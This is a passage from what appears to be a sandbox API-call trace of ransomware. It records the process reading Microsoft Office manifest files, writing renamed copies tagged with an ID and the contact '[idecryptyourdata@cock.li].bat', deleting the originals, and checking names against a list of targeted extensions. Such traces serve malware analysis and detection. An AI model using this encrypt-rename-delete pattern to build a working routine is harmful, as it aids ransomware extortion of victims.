lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4bfb, lpOverlapped=0x0) returned 1 [0058.512] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4c00, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4c00, lpOverlapped=0x0) returned 1 [0058.513] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0058.513] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0058.514] SetEndOfFile (hFile=0x344) returned 1 [0058.514] CloseHandle (hObject=0x344) returned 1 [0058.515] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.515] SetEndOfFile (hFile=0x354) returned 1 [0058.516] CloseHandle (hObject=0x354) returned 1 [0058.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0058.516] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml")) returned 1 [0058.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0058.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0058.516] lstrlenW (lpString=".doc") returned 4 [0058.516] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.516] lstrlenW (lpString=".docx") returned 5 [0058.516] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.516] lstrlenW (lpString=".pdf") returned 4 [0058.516] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.517] lstrlenW (lpString=".xls") returned 4 [0058.517] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.517] lstrlenW (lpString=".xlsx") returned 5 [0058.517] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.517] lstrlenW (lpString=".ppt") returned 4 [0058.517] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0058.517] lstrlenW (lpString=".zip") returned 4 [0058.517] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.517] lstrlenW (lpString=".rar") returned 4 [0058.517] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.517] lstrlenW (lpString=".bz2") returned 4 [0058.517] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.517] lstrlenW (lpString=".7z") returned 3 [0058.517] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0058.517] lstrlenW (lpString=".dbf") returned 4 [0058.517] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0058.517] lstrlenW (lpString=".1cd") returned 4 [0058.517] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0058.517] lstrlenW (lpString=".jpg") returned 4 [0058.517] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0058.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0058.517] lstrlenW (lpString=".doc") returned 4 [0058.517] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.517] lstrlenW (lpString=".docx") returned 5 [0058.517] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.517] lstrlenW (lpString=".pdf") returned 4 [0058.517] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.518] lstrlenW (lpString=".xls") returned 4 [0058.518] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.518] lstrlenW (lpString=".xlsx") returned 5 [0058.518] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.518] lstrlenW (lpString=".ppt") returned 4 [0058.518] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0058.518] lstrlenW (lpString=".zip") returned 4 [0058.518] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.518] lstrlenW (lpString=".rar") returned 4 [0058.518] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.518] lstrlenW (lpString=".bz2") returned 4 [0058.518] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.518] lstrlenW (lpString=".7z") returned 3 [0058.518] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0058.518] lstrlenW (lpString=".dbf") returned 4 [0058.518] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0058.518] lstrlenW (lpString=".1cd") returned 4 [0058.518] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0058.518] lstrlenW (lpString=".jpg") returned 4 [0058.518] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.518] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0058.518] lstrlenW (lpString="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 53 [0058.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0058.519] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=763363) returned 1 [0058.519] CloseHandle (hObject=0x354) returned 1 [0058.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml")) returned 0x220 [0058.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0058.520] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.520] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0058.520] GetLastError () returned 0x0 [0058.520] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xba5e3, lpOverlapped=0x0) returned 1 [0058.620] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xba5f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xba5f0, lpOverlapped=0x0) returned 1 [0058.632] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0058.632] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0058.632] SetEndOfFile (hFile=0x344) returned 1 [0058.632] CloseHandle (hObject=0x344) returned 1 [0059.031] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.032] SetEndOfFile (hFile=0x354) returned 1 [0059.037] CloseHandle (hObject=0x354) returned 1 [0059.037] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.037] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml")) returned 1 [0059.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0059.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0059.038] lstrlenW (lpString=".doc") returned 4 [0059.038] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.038] lstrlenW (lpString=".docx") returned 5 [0059.038] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.038] lstrlenW (lpString=".pdf") returned 4 [0059.038] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.038] lstrlenW (lpString=".xls") returned 4 [0059.038] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.038] lstrlenW (lpString=".xlsx") returned 5 [0059.038] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.038] lstrlenW (lpString=".ppt") returned 4 [0059.038] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0059.038] lstrlenW (lpString=".zip") returned 4 [0059.038] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.038] lstrlenW (lpString=".rar") returned 4 [0059.038] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.038] lstrlenW (lpString=".bz2") returned 4 [0059.038] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.038] lstrlenW (lpString=".7z") returned 3 [0059.038] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0059.038] lstrlenW (lpString=".dbf") returned 4 [0059.038] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0059.038] lstrlenW (lpString=".1cd") returned 4 [0059.038] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0059.039] lstrlenW (lpString=".jpg") returned 4 [0059.039] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0059.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0059.039] lstrlenW (lpString=".doc") returned 4 [0059.039] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.039] lstrlenW (lpString=".docx") returned 5 [0059.039] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.039] lstrlenW (lpString=".pdf") returned 4 [0059.039] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.039] lstrlenW (lpString=".xls") returned 4 [0059.039] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.039] lstrlenW (lpString=".xlsx") returned 5 [0059.039] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.039] lstrlenW (lpString=".ppt") returned 4 [0059.039] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0059.039] lstrlenW (lpString=".zip") returned 4 [0059.039] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.039] lstrlenW (lpString=".rar") returned 4 [0059.039] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.039] lstrlenW (lpString=".bz2") returned 4 [0059.039] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.040] lstrlenW (lpString=".7z") returned 3 [0059.040] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0059.040] lstrlenW (lpString=".dbf") returned 4 [0059.040] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0059.040] lstrlenW (lpString=".1cd") returned 4 [0059.040] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0059.040] lstrlenW (lpString=".jpg") returned 4 [0059.040] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.040] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.040] lstrlenW (lpString="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 53 [0059.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0059.041] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=1261) returned 1 [0059.041] CloseHandle (hObject=0x354) returned 1 [0059.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml")) returned 0x220 [0059.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0059.041] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.041] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0059.042] GetLastError () returned 0x0 [0059.042] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0059.144] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0059.145] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.145] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.145] SetEndOfFile (hFile=0x350) returned 1 [0059.145] CloseHandle (hObject=0x350) returned 1 [0059.146] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.146] SetEndOfFile (hFile=0x354) returned 1 [0059.147] CloseHandle (hObject=0x354) returned 1 [0059.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.147] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml")) returned 1 [0059.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0059.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0059.147] lstrlenW (lpString=".doc") returned 4 [0059.147] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.147] lstrlenW (lpString=".docx") returned 5 [0059.147] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.147] lstrlenW (lpString=".pdf") returned 4 [0059.147] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.148] lstrlenW (lpString=".xls") returned 4 [0059.148] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.148] lstrlenW (lpString=".xlsx") returned 5 [0059.148] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.148] lstrlenW (lpString=".ppt") returned 4 [0059.148] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0059.148] lstrlenW (lpString=".zip") returned 4 [0059.148] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.148] lstrlenW (lpString=".rar") returned 4 [0059.148] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.148] lstrlenW (lpString=".bz2") returned 4 [0059.148] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.148] lstrlenW (lpString=".7z") returned 3 [0059.148] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0059.148] lstrlenW (lpString=".dbf") returned 4 [0059.148] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0059.148] lstrlenW (lpString=".1cd") returned 4 [0059.148] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0059.148] lstrlenW (lpString=".jpg") returned 4 [0059.148] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0059.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0059.148] lstrlenW (lpString=".doc") returned 4 [0059.148] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.148] lstrlenW (lpString=".docx") returned 5 [0059.148] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.148] lstrlenW (lpString=".pdf") returned 4 [0059.148] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.148] lstrlenW (lpString=".xls") returned 4 [0059.148] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.148] lstrlenW (lpString=".xlsx") returned 5 [0059.149] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.149] lstrlenW (lpString=".ppt") returned 4 [0059.149] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0059.149] lstrlenW (lpString=".zip") returned 4 [0059.149] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.149] lstrlenW (lpString=".rar") returned 4 [0059.149] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.149] lstrlenW (lpString=".bz2") returned 4 [0059.149] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.149] lstrlenW (lpString=".7z") returned 3 [0059.149] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0059.149] lstrlenW (lpString=".dbf") returned 4 [0059.149] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0059.149] lstrlenW (lpString=".1cd") returned 4 [0059.149] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0059.149] lstrlenW (lpString=".jpg") returned 4 [0059.149] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.149] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.149] lstrlenW (lpString="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 53 [0059.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0059.149] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=14913) returned 1 [0059.149] CloseHandle (hObject=0x354) returned 1 [0059.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml")) returned 0x220 [0059.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 